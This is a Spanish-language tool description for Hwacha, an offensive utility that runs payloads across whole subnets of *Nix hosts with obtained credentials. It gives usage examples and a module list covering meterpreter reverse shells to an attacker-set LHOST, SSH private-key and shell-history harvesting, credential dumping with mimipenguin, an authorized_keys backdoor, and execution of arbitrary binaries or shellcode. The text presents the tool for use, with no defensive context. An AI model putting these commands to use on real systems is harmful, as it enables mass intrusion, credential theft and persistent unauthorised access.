
Desplegar cargas útiles en sistemas *Nix en masa

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha es una herramienta para ejecutar rápidamente cargas útiles en sistemas basados en *Nix. Recolecta fácilmente artefactos o ejecuta shellcode en una subred completa de sistemas para los cuales se han obtenido credenciales.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
Para ejecutar comandos, usa -x [COMANDO]
para ejecutar módulos, usa -m [MÓDULO]
para especificar opciones de módulo, usa -o [ARG=ARG ARG=ARG]
para ver todos los módulos disponibles, usa -L
Ejemplo de uso:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
Módulos Disponibles:
[*] meterpreter Úsalo para ejecutar un agente meterpreter en el/los objetivo(s).
ARGUMENTOS REQUERIDOS: LHOST , LPORT
ARGUMENTOS OPCIONALES: TYPE {python, php, 32, 64, osx}
[*] mimipenguin Úsalo para ejecutar mimipenguin en el/los objetivo(s) y recuperar credenciales. (Requiere root)
ARGUMENTOS OPCIONALES: LISTEN
[*] keys Úsalo para recolectar claves privadas SSH del/de los objetivo(s).
[*] history Úsalo para recolectar archivos de historial del shell del/de los objetivo(s).
[*] privs Úsalo para enumerar privilegios sudo en el/los objetivo(s).
[*] backdoor Crea un par de claves RSA y añade la clave pública al archivo authorized_keys en el/los objetivo(s).
[*] web_delivery Úsalo para ejecutar un script de Python en el/los objetivo(s).
ARGUMENTOS REQUERIDOS: PATH
ARGUMENTOS OPCIONALES: LISTEN
[*] custom_bin Úsalo para ejecutar un binario personalizado en el/los objetivo(s).
ARGUMENTOS REQUERIDOS: PATH
[*] sudo_exec Úsalo para ejecutar un binario personalizado (con sudo) en el/los objetivo(s).
ARGUMENTOS REQUERIDOS: PATH
[*] shellcode Úsalo para ejecutar shellcode personalizado en el/los objetivo(s).
ARGUMENTOS REQUERIDOS: PATH
Requiere paramiko:
pip install paramiko